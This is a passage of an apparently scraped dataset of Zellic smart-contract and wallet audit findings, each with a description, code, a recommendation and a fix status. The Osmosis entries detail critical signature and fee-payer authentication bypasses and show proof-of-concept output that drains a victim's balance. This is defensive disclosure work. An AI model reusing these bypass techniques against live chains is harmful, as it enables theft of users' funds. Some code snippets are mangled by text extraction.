${MIN_PASSWORD_LENGTH} characters`; } if (!values.confirm) { errors.confirm = \u201cPassword confirmation required\u201d; } else if (values.confirm.length < MIN_PASSWORD_LENGTH) { errors.confirm = `Password confirmation length should contain minimum ${MIN_PASSWORD_LENGTH} characters`; } else if (values.confirm !==)) values.password) { errors.confirm = \u201cPassword confirmation not similar\u201d; } if (!values.agreed) { errors.agreed = \u201cYou need to agree with terms and conditions\u201d; } return errors; }; A six-character password can be bruteforced in a matter of seconds, leading to a compromise of the wallet. Zellic Pontem Technology Ltd. We recommend Pontem Technology Ltd. increase the length requirements along with mandating special characters and lowercase and uppercase letters. A fix was introduced in commit e6ad1094 by adding multiple requirements on pass- word entry such as minimum password length and special characters. Zellic Pontem Technology Ltd.", + "html_url": "https://github.com/Zellic/publications/blob/master/Pontem wallet - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Cleartext password in the browser\u2019s session storage", + "labels": [ + "Zellic" + ], + "body": "Target: src/auth/hooks/useKeyring.ts Category: Coding Mistakes Likelihood: Low Severity: Low : High After a user creates or unlocks their wallet, their password is stored in plaintext in the session storage. This is a critical piece of information and should never be available in plaintext form. const createWallet = async (password: string) => { const address = await controller.createNewKeychain(password); if (IS_EXTENSION_RUNTIME) { await extension.storage.session.set({ storedPassword: password }); } return address; }; const unlock = async (password: string) => { const keyrings = await controller.unlock(password); if (IS_EXTENSION_RUNTIME) { await extension.storage.session.set({ storedPassword: password }); } return keyrings; }; An attacker with physical access to the machine or a cross-domain exploit can leak the plaintext password and mnemonic phrase. Handling of the plaintext password should be kept to the minimum and should be immediately deleted or encrypted after use. Zellic Pontem Technology Ltd. Figure 3.1: Example of cleartext password in session storage. A fix was introduced in commit 0b6c08fb by encrypting the password before setting it in the local storage. A refactor of the flow is planned, which will remove the password from storage entirely. It\u2019s worth noting that the password is not stored permanently and is automatically deleted after five minutes of inactivity. Zellic Pontem Technology Ltd.", + "html_url": "https://github.com/Zellic/publications/blob/master/Pontem wallet - Zellic Audit Report.pdf" + }, + { + "title": "5.2 Automated Static Analysis For the sake of comprehensiveness, we employed industry-standard static analysis tools, like Slither. Fortunately, our automated analyses did not uncover any notable issues. We would also like to note that the Nexus Labs implemented a Slither test in package.json. Zellic Maverick Protoco", + "labels": [ + "Zellic" + ], + "body": "5.2 Automated Static Analysis For the sake of comprehensiveness, we employed industry-standard static analysis tools, like Slither. Fortunately, our automated analyses did not uncover any notable issues. We would also like to note that the Nexus Labs implemented a Slither test in package.json. Zellic Maverick Protocol", + "html_url": "https://github.com/Zellic/publications/blob/master/Maverick Protocol - Zellic Security Assessment Report.pdf" + }, + { + "title": "5.3 Symbolic Execution and SMT Checking We attempted to run the Mythril contract analyzer on the contracts. However, the contracts are very complex, and the analyzer never completed due to the classic state explosion problem faced by symbolic execution techniques. There is a large number of operations and many loops, resulting in an exponentially large number of states to explore. In the industry, this is an active research question currently undergoing extensive study. Running the estimator and pool through the Solidity compiler\u2019s SMTChecker to for- mally verify the correctness of their relationship was also not feasible due to similar issues. As of the time of writing, the SMTChecker is not able to unroll/inline loops in the contracts, rendering it practically unusable for this engagement. However, as we discuss in the next section, we did apply fuzzing tests to strengthen the contracts\u2019 level of assurance", + "labels": [ + "Zellic" + ], + "body": "5.3 Symbolic Execution and SMT Checking We attempted to run the Mythril contract analyzer on the contracts. However, the contracts are very complex, and the analyzer never completed due to the classic state explosion problem faced by symbolic execution techniques. There is a large number of operations and many loops, resulting in an exponentially large number of states to explore. In the industry, this is an active research question currently undergoing extensive study. Running the estimator and pool through the Solidity compiler\u2019s SMTChecker to for- mally verify the correctness of their relationship was also not feasible due to similar issues. As of the time of writing, the SMTChecker is not able to unroll/inline loops in the contracts, rendering it practically unusable for this engagement. However, as we discuss in the next section, we did apply fuzzing tests to strengthen the contracts\u2019 level of assurance.", + "html_url": "https://github.com/Zellic/publications/blob/master/Maverick Protocol - Zellic Security Assessment Report.pdf" + }, + { + "title": "3.1 Centralization risk on execute function", + "labels": [ + "Zellic" + ], + "body": "Target: VerifierNetwork Category: Business Logic Likelihood: Low Severity: Medium : Low The execute function restricts the callers to only the admin role: function execute(ExecuteParam[] calldata _params) external onlyRole(ADMIN_ROLE) { for (uint i = 0; i < _params.length; +)i) { /)...)) } } } However, this restriction is unnecessary because the function requires a quorum of valid signatures. If a quorum is reached, there should be no need for the quorum-ed signatures to be sent by a trusted party. This can instead be made trustless. If an admin is unable to call execute, this will halt all the operations of the ULN. It would not be able to deliver any messages to the endpoint, even if all of the signers were online. The function should be able to be called permissionlessly to ensure the signatures may always be submitted. LayerZero Labs, after discussing with Zellic has decided that this issue does not war- rant a fix at the current time Zellic LayerZero Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/LayerZero Endpoint V2 (VerifierNetwork) - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Potential replay across chains", + "labels": [ + "Zellic" + ], + "body": "Target: VerifierNetwork Category: Business Logic Likelihood: Low Severity: Low : Low As LayerZero is a cross-chain application, VerifierNetwork might be deployed across multiple chains. There exists a possibility of message replay if signers are shared be- tween multiple instances of VerifierNetwork. This is because there is no unique iden- tifier pinning the VerifierNetwork the message can be executed at. A message can be replayed between instances of VerifierNetwork if the signers/quo- rum is shared. As the signed message includes the target address, calls to onlySelf(orAdmin) func- tions cannot be replayed. Furthermore, calls to ULN functions such as verify would not be useful to an attacker as well. Add an identifier to VerifierNetwork that is checked as part of the signature. LayerZero labs acknowled the issue and has fixed it in commit 175c08bd Zellic LayerZero Labs 4 Threat Model This assessment was conducted as part of the larger assessment for Endpoint V2. Please refer to the Endpoint V2 report for a detailed threat model. Zellic LayerZero Labs 5 Assessment Results At the time of our assessment, the reviewed code was not deployed to the Ethereum Mainnet. During our assessment on the scoped Endpoint V2 (VerifierNetwork) contracts, we discovered two findings, all of which were low impact. LayerZero Labs acknowledged all findings and implemented fixes.", + "html_url": "https://github.com/Zellic/publications/blob/master/LayerZero Endpoint V2 (VerifierNetwork) - Zellic Audit Report.pdf" + }, + { + "title": "3.1 The _getAccount function may return inaccurate information", + "labels": [ + "Zellic" + ], + "body": "Target: LockRewards Category: Coding Mistakes Likelihood: Medium Severity: Low : Informational The function returns the following information: balance, the amount of tokens deposited by the user \u2013 lockEpochs, the number of epochs for which the tokens are locked \u2013 lastEpochPaid, the last epoch for which the user has received rewards \u2013 rewards, an array of the rewards for each token The function retrieves the first three values from the accounts mapping, while the last value is calculated in a for loop. The loop iterates over the rewardTokens array, which contains the current list of reward tokens. However, since the accounts[owner].rewards mapping contains rewards for all tokens that the user has ever accrued and not claimed, if the user has accrued rewards for a token that is not in the current rewardTokens list, the function will not include it, resulting in an incomplete rewards list. function _getAccount(address owner) internal view returns (uint256 balance, uint256 lockEpochs, uint256 lastEpochPaid, uint256[] memory rewards) { rewards = new uint256[](rewardTokens.length); for (uint256 i = 0; i < rewardTokens.length;) { rewards[i] = accounts[owner].rewards[rewardTokens[i]]; unchecked { +)i; } } Zellic H20 return (accounts[owner].balance, accounts[owner].lockEpochs, accounts[owner].lastEpochPaid, rewards); } There are no security risks associated with this bug, but it could potentially cause confusion for users: the function may not accurately reflect the rewards that the user has accrued for tokens that are not currently in the reward tokens list. We recommend modifying the for loop to iterate over the accounts[owner].rewardTo kens array as shown below: for (uint256 i = 0; i < accounts[owner].rewardTokens.length;) { address addr = accounts[owner].rewardTokens[i]; uint256 reward = accounts[owner].rewards[addr]; rewards[i] = reward; unchecked { +)i; } } The issue has been fixed by H20 in commit 81f252c5. Zellic H20", + "html_url": "https://github.com/Zellic/publications/blob/master/H20 vlPSDN - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Centralization risk: reward token recovery", + "labels": [ + "Zellic" + ], + "body": "Target: LockRewards Category: Coding Mistakes Likelihood: Low Severity: Informational : Informational In the recoverERC20 function, the owner can recover any ERC20 token excluding lockToken. In the recoverERC721 function, the owner can recover any ERC721 token. In the event that the owner\u2019s private key is compromised, an attacker could potentially steal all reward tokens that have not yet been claimed by users by whitelisting a token and calling the recoverERC20 function. The changeRecoverWhitelist function does contain a check to prevent the owner from removing the governance token: /** * @notice Add or remove a token from recover whitelist, * cannot whitelist governance token * @dev Only contract owner are allowed. Emits an event * allowing users to perceive the changes in contract rules. * The contract allows to whitelist the underlying tokens * (both lock token and rewards tokens). This can be exploited * by the owner to remove all funds deposited from all users. * This is done bacause the owner is mean to be a multisig or * treasury wallet from a DAO * @param flag: set true to allow recover *) function changeRecoverWhitelist(address tokenAddress, bool flag) external onlyOwner { if (tokenAddress =) lockToken) revert CannotWhitelistLockedToken(lockToken); if (tokenAddress =) rewardTokens[0]) revert CannotWhitelistGovernanceToken(rewardTokens[0]); whitelistRecoverERC20[tokenAddress] = flag; emit ChangeERC20Whiltelist(tokenAddress, flag); } Zellic H20 However, the check is ineffective because the owner can simply remove all tokens from rewardTokens using the removeReward function. This allows the owner to steal all reward funds. Use a multi-signature address wallet; this would prevent an attacker from caus- ing economic damage if a private key were compromised. Set critical functions behind a timelock to catch malicious executions in the case of compromise. Prohibit withdrawal of reward tokens. H20 added a new role called PAUSE_SETTER_ROLE that is responsible for administering the pause and unpause functionality. Additionally, they have implemented the use of TimeLockController for ownership in commit 77d735f0. Zellic H20", + "html_url": "https://github.com/Zellic/publications/blob/master/H20 vlPSDN - Zellic Audit Report.pdf" + }, + { + "title": "3.1 migratePool results in loss of funds", + "labels": [ + "Zellic" + ], + "body": "Target: LendingStorageManager Category: Business Logic Likelihood: Low Severity: Medium : High The lending storage manager includes a function to migrate the multiple liquidity pool to a new address; this function can only be called by the multiple liquidity pool. The migration function does not migrate critical accounting information such as the total number of synthetic tokens or the collateral assets of the liquidity providers. function migratePool(address oldPool, address newPool) external override nonReentrant onlyPoolFactory { ...)) /) copy storage to new pool newPoolData.lendingModuleId = oldLendingId; newPoolData.collateral = oldPoolData.collateral; newPoolData.interestBearingToken = oldPoolData.interestBearingToken; newPoolData.jrtBuybackShare = oldPoolData.jrtBuybackShare; newPoolData.daoInterestShare = oldPoolData.daoInterestShare; newPoolData.collateralDeposited = oldPoolData.collateralDeposited; newPoolData.unclaimedDaoJRT = oldPoolData.unclaimedDaoJRT; newPoolData.unclaimedDaoCommission = oldPoolData.unclaimedDaoCommission ; ...)) } The following critical accounting information in the pool is not migrated: contract SynthereumMultiLpLiquidityPool...)) uint256 internal totalSyntheticAsset; Zellic Jarvis ...)) mapping(address => LPPosition) internal lpPositions; ...)) The multiple liquidity pool currently does not implement a function calling the pool migration function; however, implementing a function calling the migration function in its current state would result in lost funds. We recommend removing the function until the implementation is corrected. We further note that fixing these issues will require more than just changing the migrate Pool(...))) function in the lending storage manager; it will also require changes to be made in the multiple liquidity pool to update the fields totalSyntheticAsset and read and update the lpPositions mapping. Jarvis has made considerable efforts to address the concerns conveyed in this find- ing. They have created a library for managing the pool migration, which appears to address the main concerns of (1) migrating LP-level collateral and token assets and (2) migrating total pool synthetic tokens. It is important to note, however, that this mi- gration contract lies outside of the core scope of this audit and has hence not received the same level of scrutiny as the rest of the contracts. Furthermore, we have not been presented with an updated multiple liquidity pool contract that utilizes this library for pool migrations. Jarvis appears to be on the right track here, and we look forward to seeing a completed and safely implemented pool migration function in the future. Zellic Jarvis", + "html_url": "https://github.com/Zellic/publications/blob/master/Jarvis Network Synthereum - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Swap lacks slippage and path checks", + "labels": [ + "Zellic" + ], + "body": "Target: Univ2JRTSwap Category: Business logic Likelihood: Medium Severity: Low : Medium The Uniswap module of swapping collateral into JRT does not support passing a pa- rameter for the slippage check. amountOut = router.swapExactTokensForTokens( amountIn, 0, /) no slippage check swapInfo.tokenSwapPath, recipient, swapInfo.expiration )[swapInfo.tokenSwapPath.length - 1]; Moreover, the last element of the swap\u2019s path is not checked to be the JRT token. The protocol may lose tokens due to overallowance of slippage, since the swap itself can get sandwich attacked by front runners. This may heavily affect larger amounts of collateral being swapped. We recommend implementing the minTokensOut field in the SwapInfo and then passing that in the swap function call. amountOut = router.swapExactTokensForTokens( amountIn, swapInfo.minTokensOut, /) slippage check passed swapInfo.tokenSwapPath, recipient, swapInfo.expiration )[swapInfo.tokenSwapPath.length - 1]; Moreover, similarly to the BalancerJRTSwap\u2019s SwapInfo struct, we recommend adding Zellic Jarvis the jrtAddress field and checking it to match with the last index of the swap path, like so: ...)) uint256 swapLength = swapInfo.tokenSwapPath.length; require( swapInfo.tokenSwapPath[swapLength \u2212 1] =) jrtAddress, 'Wrong swap asset' ); ...)) Jarvis has sufficiently addressed the finding by introducing the necessary anti-slippage parameter and required check for the last element of the swap path to be equal to the address of the JRT token. Zellic Jarvis", + "html_url": "https://github.com/Zellic/publications/blob/master/Jarvis Network Synthereum - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Centralization risk", + "labels": [ + "Zellic" + ], + "body": "Target: Project Wide, IFinder Category: Centralization Risk Likelihood: N/A Severity: Low : Low The protocol relies heavily on the synthereum finder to provide the correct addresses for critical contract interactions such as the price feed, lending manager, lending stor- age manager, commission receiver, buy back program receiver, and the interest bear- ing token. For example, function _getPriceFeedRate( ISynthereumFinder _finder, bytes32 _priceIdentifier ) internal view returns (uint256) { ISynthereumPriceFeed priceFeed = ISynthereumPriceFeed( _finder.getImplementationAddress(SynthereumInterfaces.PriceFeed) ); return priceFeed.getLatestPrice(_priceIdentifier); } Although the function in _finder that manages the contract addresses is access con- trolled (as shown in the code below), compromised keys could result in exploitation. For example, an attacker could change the priceFeed to a malicious contract. The compromised priceFeed could report a heavily depressed price to allow the attacker to mint a large number of synthetic tokens for very little collateral. The attacker could then massively increase the price to redeem synthetic tokens for a large amount of collateral, effectively draining the pool of its collateral assets. function changeImplementationAddress( bytes32 interfaceName, address implementationAddress ) external override onlyMaintainer { interfacesImplemented[interfaceName] = implementationAddress; Zellic Jarvis emit InterfaceImplementationChanged(interfaceName, implementationAddress); } The use of a multisignature address wallet can prevent an attacker from causing eco- nomic damage in the event a private key is compromised. Timelocks can also be used to catch malicious executions, such as a change to the implementationAddressof thepriceFeed. Jarvis is aware of the centralization risks introduced by the synthereum finder but em- phasizes the importance of the synthereum finder in mitigating attacks from imposter contracts such as fake pools. They acknowledge that the synthereum finder could be compromised by leaked keys and, therefore, have implemented the following multi- stage protection protocol: 1. The synthereum finder is controlled by an Admin account and a Maintainer ac- count. The Admin account controls the Admin and Maintainer roles while the Maintainer controls the addresses pointed to by the synthereum finder. In the event the Maintainer is compromised, the Admin role can revoke its rights. 2. Both the Admin and Maintainer roles are managed by two of four signature Gno- sis Safe multisigs. 3. Ledger devices are used as signers of the multisigs to add an additional layer of security over hot wallets. Jarvis has further indicated that the Ledger keys are distributed among different company officers and are stored securely. In the future, the Admin and Maintainer roles will be moved to an on-chain DAO and the multisig will be upgraded to a three of five. At that time, time-lock mechanisms may also be introduced. Zellic Jarvis", + "html_url": "https://github.com/Zellic/publications/blob/master/Jarvis Network Synthereum - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Signature authenticator authentication bypass", + "labels": [ + "Zellic" + ], + "body": "Target: x/authenticator/authenticator/ante.go Category: Coding Mistakes Likelihood: High Severity: Critical : Critical For legacy support, the signature authenticator is used by default for any accounts without any registered authenticators. The signature authenticator implements the GetAuthenticationData handler for the Authenticator interface. The handler parses signers and signatures from the transaction and returns an indexed list of both the signers and the signatures. However, the message index is cast to int8 before the handler is invoked: authData, err :) authenticator.GetAuthenticationData(neverWriteCacheCtx, tx, int8(msgIndex), simulate) if err !) nil { return ctx, err } This causes the cast to overflow, resulting in the message index becoming negative. func GetSignersAndSignatures( msgs []sdk.Msg, suppliedSignatures []signing.SignatureV2, feePayer string, /) we use the message index to get signers and signatures for /) a specific message, with all messages. msgIndex int, ) ([]sdk.AccAddress, []signing.SignatureV2, error) { [...))] /) Iterate over messages and their signers. for i, msg :) range msgs { for _, signer :) range msg.GetSigners() { [...))] Zellic Osmosis Labs /) If dealing with a specific message, capture its signers. if specificMsg &) i =) msgIndex { resultSigners = append(resultSigners, signer) } Since msgIndex is negative, specificMsg &) i =) msgIndex will never match. This causes GetSignersAndSignatures to return empty lists for signers and signatures. Signature checks are skipped for transactions having more than 128 messages. This could allow an attacker to maliciously sign and execute any message \u2014 for example, sending coins to themselves. They could simply add fake signature and signer info to the message, and it would get executed. An example proof of concept (POC), which is located in the appendix 7.1, was provided to Osmosis Labs that demonstrates an attacker signing a message to transfer coins to themselves: The POC will output the following: Balances before: hacker: amount: \u201d139621170\u201d denom: uosmo victim: amount: \u201d99351536125\u201d denom: uosmo { \u201dmsg_index\u201d: 128, \u201dlog\u201d: \u201d\u201d, \u201devents\u201d: [ { \u201dtype\u201d: \u201dcoin_received\u201d, \u201dattributes\u201d: [ { \u201dkey\u201d: \u201dreceiver\u201d, \u201dvalue\u201d: \u201dosmo1d6aldupd067vm4807qvkcm20j5ts2nmhzwu4y7\u201d }, { \u201dkey\u201d: \u201damount\u201d, \u201dvalue\u201d: \u201d10000000uosmo\u201d } Zellic Osmosis Labs ] }, { \u201dtype\u201d: \u201dcoin_spent\u201d, \u201dattributes\u201d: [ { \u201dkey\u201d: \u201dspender\u201d, \u201dvalue\u201d: \u201dosmo12smx2wdlyttvyzvzg54y2vnqwq2qjateuf7thj\u201d }, { \u201dkey\u201d: \u201damount\u201d, \u201dvalue\u201d: \u201d10000000uosmo\u201d } ] }, { \u201dtype\u201d: \u201dmessage\u201d, \u201dattributes\u201d: [ { \u201dkey\u201d: \u201daction\u201d, \u201dvalue\u201d: \u201d/cosmos.bank.v1beta1.MsgSend\u201d }, { \u201dkey\u201d: \u201dsender\u201d, \u201dvalue\u201d: \u201dosmo12smx2wdlyttvyzvzg54y2vnqwq2qjateuf7thj\u201d }, { \u201dkey\u201d: \u201dmodule\u201d, \u201dvalue\u201d: \u201dbank\u201d } ] }, { \u201dtype\u201d: \u201dtransfer\u201d, \u201dattributes\u201d: [ { \u201dkey\u201d: \u201drecipient\u201d, \u201dvalue\u201d: \u201dosmo1d6aldupd067vm4807qvkcm20j5ts2nmhzwu4y7\u201d }, { \u201dkey\u201d: \u201dsender\u201d, \u201dvalue\u201d: \u201dosmo12smx2wdlyttvyzvzg54y2vnqwq2qjateuf7thj\u201d Zellic Osmosis Labs }, { \u201dkey\u201d: \u201damount\u201d, \u201dvalue\u201d: \u201d10000000uosmo\u201d } ] } ] } Balances after: hacker: amount: \u201d149608670\u201d denom: uosmo victim: amount: \u201d99341536125\u201d denom: uosmo The int8 cast should be removed since it is not required. This issue has been acknowledged by Osmosis Labs, and a fix was implemented in commit 50eb8ae5. The int8 cast was removed for message indexes. Zellic Osmosis Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Osmosis Authentication Abstraction - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Bypass fee payer authentication", + "labels": [ + "Zellic" + ], + "body": "Target: x/authenticator/ante/ante.go Category: Coding Mistakes Likelihood: High Severity: Critical : Critical The authenticator\u2019s job is to validate the signature of a message and ensure that the required accounts have signed it, including the fee payer if one is specified. When custom CosmWasm authenticators are added (or if an empty AllOfAuthenticator is used) then it is possible for an authenticator to be added that will return iface.Authe nticated() regardless of whether the fee payer has signed the message or not: /) Consume the authenticator's static gas cacheCtx.GasMeter().ConsumeGas(authenticator.StaticGas(), \u201dauthenticator static gas\u201d) /) Get the authentication data for the transaction neverWriteCacheCtx, _ :) cacheCtx.CacheContext() /) GetAuthenticationData is not allowed to modify the state authData, err :) authenticator.GetAuthenticationData(neverWriteCacheCtx, tx, msgIndex, simulate) if err !) nil { return ctx, err } authentication :) authenticator.Authenticate(cacheCtx, account, msg, authData) if authentication.IsRejected() { return ctx, authentication.Error() } if authentication.IsAuthenticated() { msgAuthenticated = true /) Once the fee payer is authenticated, we can set the gas limit to its original value if !feePayerAuthenticated &) account.Equals(feePayer) { originalGasMeter.ConsumeGas(payerGasMeter.GasConsumed(), \u201dfee payer gas\u201d) /) Reset this for both contexts Zellic Osmosis Labs cacheCtx = ad.authenticatorKeeper.TransientStore. GetTransientContextWithGasMeter(originalGasMeter) ctx = ctx.WithGasMeter(originalGasMeter) feePayerAuthenticated = true } break } This will cause the entire fee to be deducted from the fee payer in the DeductFeeDecor ator ante handler, but since the feePayerAuthenticated will not be set to true (account is based off the message\u2019s GetSigner, which will not match if a separate fee payer is specified), the amount of gas will be limited to 20,000. A malicious user can set up an authenticator to always verify any message, then send messages with high fees and a separate fee payer to drain any account of its funds. An example POC, which is located in the appendix 7.2, was provided to Osmosis Labs that demonstrates forcing someone to pay 100,0000 in fees without signing the mes- sage: The POC will output the following: Balances before: hacker (osmo1m6a73d0qhl9kphwx84syysnrr3t3myxvhw3f5d): amount: \u201d103875\u201d victum (osmo12smx2wdlyttvyzvzg54y2vnqwq2qjateuf7thj): amount: \u201d99362536125\u201d # transfer log { \u201dtype\u201d: \u201dtransfer\u201d, \u201dattributes\u201d: [ { \u201dkey\u201d: \u201drecipient\u201d, \u201dvalue\u201d: \u201dosmo17xpfvakm2amg962yls6f84z3kell8c5lczssa0\u201d, \u201dindex\u201d: false }, { \u201dkey\u201d: \u201dsender\u201d, \u201dvalue\u201d: \u201dosmo12smx2wdlyttvyzvzg54y2vnqwq2qjateuf7thj\u201d, \u201dindex\u201d: false Zellic Osmosis Labs }, { \u201dkey\u201d: \u201damount\u201d, \u201dvalue\u201d: \u201d1000000uosmo\u201d, \u201dindex\u201d: false } ] } Balances after: hacker: amount: \u201d103875\u201d victim: amount: \u201d99361536125\u201d The fee payer should always be authenticated regardless of the authenticator used. This issue has been acknowledged by Osmosis Labs, and a fix was implemented in commit 651eccd9. The feePayerAuthenticated is always authenticated now. Zellic Osmosis Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Osmosis Authentication Abstraction - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Unnecessary casting of salt parameter", + "labels": [ + "Zellic" + ], + "body": "Target: LightWalletFactory Category: Optimizations Likelihood: N/A Severity: Informational : Informational The type of the parameter salt in the createAccount and getAddress functions is uint 256, but the functions both cast it to bytes32 in all uses of the parameter. The salt parameter\u2019s type can be directly set to bytes32, eliminating the need for type conversion within the functions: function createAccount(bytes32 hash, uint256 salt) public returns ( LightWallet ret) { function createAccount(bytes32 hash, bytes32 salt) public returns ( LightWallet ret) { address addr = getAddress(hash, salt); /) [...))] ret = LightWallet( payable( new ERC1967Proxy{salt : bytes32(salt)}( new ERC1967Proxy{salt : salt}( address(accountImplementation), abi.encodeCall(LightWallet.initialize, (hash)) ) ) ); } /) [...))] function getAddress(bytes32 hash, uint256 salt) public view returns ( Zellic Light, Inc. address) { function getAddress(bytes32 hash, bytes32 salt) public view returns ( address) { /) Computes the address with the given `salt`and the contract address `accountImplementation`, and with `initialize` method w/ `hash` return Create2.computeAddress( bytes32(salt), salt, keccak256( abi.encodePacked( type(ERC1967Proxy).creationCode, abi.encode(address(accountImplementation), abi.encodeCall(LightWallet.initialize, (hash))) ) ) ); } This issue has been acknowledged by Light, Inc., and a fix was implemented in commit 6a1a082e. Zellic Light, Inc. 4 Threat Model This provides a full threat model description for various functions. As time permit- ted, we analyzed each function in the contracts and created a written threat model for some critical functions. A threat model documents a given function\u2019s externally controllable inputs and how an attacker could leverage each input to cause harm. Not all functions in the audit scope may have been modeled. The absence of a threat model in this section does not necessarily suggest that a function is safe.", + "html_url": "https://github.com/Zellic/publications/blob/master/LightWallet - Zellic Audit Report.pdf" + }, + { + "title": "4.1 Module: LightWalletFactory.sol Function: createAccount(byte[32] byte[32], uint256 uint256) This is a helper function used to get the address of a deployed LightWallet contract or deploy a new one. Inputs", + "labels": [ + "Zellic" + ], + "body": "hash \u2013 Control: Full. \u2013 Constraints: None. \u2013 : Specifies the EntryPoint address the LightWallet should use. salt \u2013 Control: Full. \u2013 Constraints: None. \u2013 : Specifies the salt to use when deploying the proxy contract for LightWallet. Branches and code coverage (including function calls) Intended branches Account already exists \u2014 return existing LightWallet. 4\u25a1 Test coverage Account does not exist \u2014 create new LightWallet. 4\u25a1 Test coverage", + "html_url": "https://github.com/Zellic/publications/blob/master/LightWallet - Zellic Audit Report.pdf" + }, + { + "title": "4.2 Module: LightWallet.sol Zellic Light, Inc. Function: executeBatch(address[] dest, uint256[] value, byte[][] func) Executes a sequence of transactions (called directly by entryPoint). Inputs", + "labels": [ + "Zellic" + ], + "body": "dest \u2013 Control: Fully controlled by the user. \u2013 Constraints: N/A. \u2013 : The array of the address of the target contract to call. value \u2013 Control: Fully controlled by the user. \u2013 Constraints: N/A. \u2013 : The array of amount of Wei (ETH) to send along with the call. func \u2013 Control: Fully controlled by the user. \u2013 Constraints: N/A. \u2013 : The array of calldata to send to the target contract. Branches and code coverage (including function calls) Intended branches Tests that the account can run executeBatch correctly. 4\u25a1 Test coverage Tests that the account can run executeBatch correctly with value.length =) 0. 4\u25a1 Test coverage Negative behavior Tests that the account reverts when running executeBatch from a non-entryPoi nt. 4\u25a1 Negative test Tests that the account reverts when dest.length is not equal with func.length. \u25a1 Negative test Function call analysis executeBatch -> _call(address target, uint256 value, bytes memory data) -> target.call{value: value}(data) \u2013 What is controllable? target, value, and data. \u2013 If return value controllable, how is it used and how can it go wrong? N/A. \u2013 What happens if it reverts, reenters, or does other unusual control flow? Zellic Light, Inc. If there is a reentry attempt, the function will revert because the execute method is called from a non-entryPoint. Function: execute(address dest, uint256 value, byte[] func) Executes a transaction (called directly by entryPoint). Inputs dest \u2013 Control: Fully controlled by the user. \u2013 Constraints: N/A. \u2013 : The address of the target contract to call. value \u2013 Control: Fully controlled by the user. \u2013 Constraints: N/A. \u2013 : The amount of Wei (ETH) to send along with the call. func \u2013 Control: Fully controlled by the user. \u2013 Constraints: N/A. \u2013 : The calldata to send to the target contract. Branches and code coverage (including function calls) Intended branches Tests that the account can run execute correctly. 4\u25a1 Test coverage Negative behavior Tests that the account reverts when running execute from a non-entryPoint. 4\u25a1 Negative test Function call analysis execute -> _call(address target, uint256 value, bytes memory data) -> target.call{value: value}(data) \u2013 What is controllable? target, value, and data. \u2013 If return value controllable, how is it used and how can it go wrong? N/A. \u2013 What happens if it reverts, reenters, or does other unusual control flow? If there is a reentry attempt, the function will revert because the execute method is called from a non-entryPoint. Zellic Light, Inc. 5 Assessment Results At the time of our assessment, the reviewed code was not deployed to the Ethereum Mainnet. During our assessment on the scoped LightWallet contracts, we discovered one find- ing, which was informational in nature. Light, Inc. acknowledged the finding and im- plemented a fix.", + "html_url": "https://github.com/Zellic/publications/blob/master/LightWallet - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Vester incorrect burn", + "labels": [ + "Zellic" + ], + "body": "Target: VesterNoReserve Category: Business Logic Likelihood: High Severity: High : High Vesting is the process of locking tokens for a certain interval of time, after which the tokens are returned with rewards. The function _updateVesting, that is called to up- date vesting states burns esToken, which represent the users locked tokens, from the account. This is incorrect as locked esTokens are transferred to the Vesting contract when deposited. function _updateVesting(address _account) private { uint256 amount = _getNextClaimableAmount(_account); lastVestingTimes[_account] = block.timestamp; if (amount =) 0) { return; } /) transfer claimableAmount from balances to cumulativeClaimAmounts _burn(_account, amount); cumulativeClaimAmounts[_account] = cumulativeClaimAmounts[_account] + amount; IRestrictedToken(esToken).burn(_account, amount); } If a user deposits more than half of their esToken, they cannot claim or withdraw more tokens without acquiring more esToken as it will revert due to the lack of tokens during the burn. If the user has enough tokens to be burned (not deposited tokens), every time _updat Zellic GammaSwap eVesting is called, their esTokens will be burned, receiving no tokens in return. Correct the logic to burn tokens from the Vester contract and not from the user. This issue has been acknowledged by GammaSwap, and a fix was implemented in commit a3672730. Zellic GammaSwap", + "html_url": "https://github.com/Zellic/publications/blob/master/GammaSwap Staking - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Cancellation of isDepositToken still allows rewards to be claimed", + "labels": [ + "Zellic" + ], + "body": "Target: RewardTracker Category: Coding Mistakes Likelihood: Low Severity: Medium : Medium The isDepositToken mapping is used to validate whether a token is whitelisted to be staked in the contract. function _stake(address _fundingAccount, address _account, address _depositToken, uint256 _amount) internal virtual { /) ...)) require(isDepositToken[_depositToken], \u201dRewardTracker: invalid _depositToken\u201d); IERC20(_depositToken).safeTransferFrom(_fundingAccount, address(this), _amount); /) ...)) } A similar check is performed upon unstaking of tokens. function _unstake(address _account, address _depositToken, uint256 _amount, address _receiver) internal virtual { /) ...)) require(isDepositToken[_depositToken], \u201dRewardTracker: invalid _depositToken\u201d); /) ...)) _burn(_account, _amount); IERC20(_depositToken).safeTransfer(_receiver, _amount); } Thus, if the isDepositToken mapping is set to False after previously being True, any amount of tokens that have been staked in the contract will not be able to be unstaked. Zellic GammaSwap Despite this, the rewards that have been accumulated will still be claimable. The impact of this issue depends on the implementation of the rest of the protocol and several other considerations. Since theoretically the isDepositToken can be called again to re-whitelist the token, the impact is diminished. However, in the case that the isDepositToken is a token that has been compromised and is no longer wanted by the system, this quick fix is no longer a viable alternative, and the issue becomes a severe problem, as the rewards are still accruing. We recommend reconsidering the accrual of rewards for tokens that have been re- moved from the isDepositToken mapping. Essentially, they should not be considered towards the total amount of rewards that are claimable. This issue has been acknowledged by GammaSwap, and a fix was implemented in commit d29a27bb. It is important to note, however, that the fix simply removes the isDepositToken check from the _unstake function. This could pose a security risk down the line if the deposit Balances mapping is not properly updated on its own, as the _depositToken parameter is not checked for validity. Zellic GammaSwap", + "html_url": "https://github.com/Zellic/publications/blob/master/GammaSwap Staking - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Check validity of parameters", + "labels": [ + "Zellic" + ], + "body": "Target: StakingRouter Category: Business Logic Likelihood: Low Severity: Informational : Informational Parameters such as the _gsPool in StakingRouter\u2019s functions could be checked for va- lidity. For example, function withdrawEsGsForPool(address _gsPool) external nonReentrant { 